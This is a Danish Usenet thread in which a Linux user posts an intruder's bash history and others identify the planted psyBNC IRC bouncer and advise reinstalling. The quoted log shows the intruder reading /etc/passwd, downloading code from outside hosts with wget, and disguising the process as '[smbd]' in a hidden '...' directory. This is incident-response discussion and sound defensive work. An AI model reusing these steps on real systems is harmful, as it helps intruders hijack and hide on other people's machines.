---

Hej,

Jeg har haft besøg på min Linux, og vil gerne høre forslag om hvad der er
foregået. Jeg ved ikke hvad manden har ønsket med min maskine, og vil gerne
have et bud.

Ved ikke hvordan han kom ind, men det har sikkert ikke været svært. Maskinen
var piv-åben - der var ikke nogen beskyttelse i for af firewall.

Jeg havde få timer forinden installeret icq. Måske er der en sammenhæng.

I får lige uddrag fra /root/.bash_history:

....(mit)...
cat /etc/passwd
passwd mysql
passwd postgres
netstat -na
clear
cat /proc/cpuinfo
cat /etc/issue
gcc
history
lastlog
exit
adduser moac
passwd moac
....(mit)...

og fra /home/user/moac/.bash_history:
mkdir ...
mkdir backups
cd ...
wget http://redmoon.reverse.net/irc/bouncers/psybnc/psyBNC2.2.2.tar.gz
rm index.html
wget http://www.antiserver.it/bnc/download/unix/psyBNC2.2.2.tar.gz
tar -zxvf psyBNC2.2.2.tar.gz
tar zxvf psyBNC2.2.2.tar.gz
rm psyBNC2.2.2.tar.gz
wget http://bluemoon.reverse.net/irc/bouncers/psybnc/psyBNC2.3.1.tar.gz
tar -zxvf psyBNC2.3.1.tar.gz
cd psybnc
make
ls
pico psybnc.conf
vi psybnc.conf
ls
../psybnc
kill -9 5198
ls
ps ax
ls
mv psybnc [smbd]
PATH="./$PATH"
[smbd]
ls
../[smbd]
kill -9 5216
PATH="./:$PATH"
[smbd]
ps x
cd ..
mv psybnc ...
ls
rm psyBNC2.3.1.tar.gz
cd ..
ps ax
exit

under /home/moac/.../... ligger psyBNC ganske rigtigt. Ved ikke hvad det
gør. Er andre filer interessante? Jeg har en kopi.

Nå - jeg har slettet brugeren, installeret en firewall og kylet icq af H.T.
Jeg har skiftet diverse passwords, og fjernet adgang til ssh og ftp.

Er der nogen som ved hvad manden har lavet?

---

"Jesper Voetmann" <jvoetmann@adslhome.dk> skrev i en meddelelse
news:3f3ff7a4$0$5137$edfadb0f@dread11.news.tele.dk...
> Hej,
>
> Jeg har haft besøg på min Linux, og vil gerne høre forslag om hvad der er
> foregået. Jeg ved ikke hvad manden har ønsket med min maskine, og vil
gerne
> have et bud.
>

<snip>


> ls
> ps ax
> ls
> mv psybnc [smbd]
> PATH="./$PATH"
> [smbd]
> ls
> ./[smbd]
> kill -9 5216
> PATH="./:$PATH"
> [smbd]
> ps x
> cd ..
> mv psybnc ...
> ls
> rm psyBNC2.3.1.tar.gz
> cd ..
> ps ax
> exit
>
> under /home/moac/.../... ligger psyBNC ganske rigtigt. Ved ikke hvad det
> gør. Er andre filer interessante? Jeg har en kopi.
>
> Nå - jeg har slettet brugeren, installeret en firewall og kylet icq af
H.T.
> Jeg har skiftet diverse passwords, og fjernet adgang til ssh og ftp.
>
> Er der nogen som ved hvad manden har lavet?
>

Ja, manden har installeret en bouncer til brug i forbindelse med irc, så han
kan tilgå ircnetværk via din maskine så det ser ud til at komme fra din
linie og ikke hans egen som så bouncer videre via din, dette vil skjule hans
identitet kunne formodes brugt i forbindelse med brud på de forskellige
netværks regler og evt i forbindelse med cracking/hacking af netværks
servere eller brugere.
Et eksempel på et af de store ircnetværk er f.eks quakenet
(www.quakenet.org)
Hvis du vil vide mere om psybnc, så kan google anbefales.

Mvh Anders Christensen

---

Tak.

Anders Christensen wrote:


> Ja, manden har installeret en bouncer til brug i forbindelse med irc, så
> han kan tilgå ircnetværk via din maskine så det ser ud til at komme fra
> din linie og ikke hans egen som så bouncer videre via din, dette vil
> skjule hans identitet kunne formodes brugt i forbindelse med brud på de
> forskellige netværks regler og evt i forbindelse med cracking/hacking af
> netværks servere eller brugere.
> Et eksempel på et af de store ircnetværk er f.eks quakenet
> (www.quakenet.org)
> Hvis du vil vide mere om psybnc, så kan google anbefales.
>
> Mvh Anders Christensen

---

Jesper Voetmann <jvoetmann@adslhome.dk> wrote in
news:3f3ff7a4$0$5137$edfadb0f@dread11.news.tele.dk:

<Snip>
> Er der nogen som ved hvad manden har lavet?

Ser ud til at "manden" har installeret en irc bouncer

http://www.psychoid.lam3rz.de/

--
Mvh
Heine Laursen

---

Heine Laursen <gozar@myrealbox.com> writes:

> Jesper Voetmann <jvoetmann@adslhome.dk> wrote in
> news:3f3ff7a4$0$5137$edfadb0f@dread11.news.tele.dk:
>
> <Snip>
>> Er der nogen som ved hvad manden har lavet?
>
> Ser ud til at "manden" har installeret en irc bouncer
>
> http://www.psychoid.lam3rz.de/

Spoergsmaalet er saa bare, om det er det eneste, han har lavet....


/Claus A

---

Jeg kender ikke lige de nævnte værktøjer, men som udgangspunkt må man
antage, at han har kunnet pille i ALT, og at du derfor skal redde data og
nyinstallere.

Jeg har dog med success på et tidspunkt foretaget en opgradering af
operativsystemet på en maskine, der var hacket, hvorved alle programfilerne
blev udskiftet, og hackeren smidt ud.

Du skal påregne, at hackeren har installeret modificerede programmer som
"ls", "top", "ps" osv., der ikke viser de mapper, han har oprettet og ikke
viser de programmer, han kører osv.

Lars.

Jesper Voetmann wrote:
> Jeg har haft besøg på min Linux, og vil gerne høre forslag om hvad der er
> foregået. Jeg ved ikke hvad manden har ønsket med min maskine, og vil
gerne
> have et bud.

--
Freelance programmør

---

I dk.edb.system.unix, skrev Lars Dybdahl:
> Jeg har dog med success på et tidspunkt foretaget en opgradering af
> operativsystemet på en maskine, der var hacket, hvorved alle programfilerne
> blev udskiftet, og hackeren smidt ud.

Hvordan kan du være sikker på det?

--
../Jesper Krogh, jesper@krogh.cc
Jabber ID: jesper@jabber.krogh.cc
Tøm din hjerne for Linuxviden på http://www.linuxwiki.dk

---

Ok, tak for råd. Jeg vil installere igen.

Lars Dybdahl wrote:

> Jeg kender ikke lige de nævnte værktøjer, men som udgangspunkt må man
> antage, at han har kunnet pille i ALT, og at du derfor skal redde data og
> nyinstallere.
>
> Jeg har dog med success på et tidspunkt foretaget en opgradering af
> operativsystemet på en maskine, der var hacket, hvorved alle
> programfilerne blev udskiftet, og hackeren smidt ud.
>
> Du skal påregne, at hackeren har installeret modificerede programmer som
> "ls", "top", "ps" osv., der ikke viser de mapper, han har oprettet og ikke
> viser de programmer, han kører osv.
>
> Lars.
>

---

Jesper Voetmann <jvoetmann@adslhome.dk> wrote:
> Jeg har haft besøg på min Linux, og vil gerne høre forslag om hvad der er
> foregået. Jeg ved ikke hvad manden har ønsket med min maskine, og vil gerne
> have et bud.

Det sidste aar eller 2 er det blevet populaert at bryde ind i
tilfaeldige maskiner og bruge dem enten som IRC proxy (som i dit
tilfaelde) eller til opbevaring og deling af kommercielt software, film,
etc. Andre bruger ogsaa saadanne maskiner til at installere DDoS
agenter.

> Ved ikke hvordan han kom ind, men det har sikkert ikke været svært. Maskinen
> var piv-åben - der var ikke nogen beskyttelse i for af firewall.

En firewall giver ikke noedvendigvis sikkerhed. Se OSS'en for
dk.edb.sikkerhed:

http://a.area51.dk/sikkerhed/ordforklaring#firewalls

Laes om at drifte en server der er koblet paa nettet:

http://a.area51.dk/sikkerhed/servere

> Nå - jeg har slettet brugeren, installeret en firewall og kylet icq af H.T.
> Jeg har skiftet diverse passwords, og fjernet adgang til ssh og ftp.

Jeg vil tro han stadigt har adgang til din maskine. Mit raad er at
tage en kopi af dine data og geninstallere:

http://www.cert.org/tech_tips/win-UNIX-system_compromise.html

--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow. http://a.mongers.org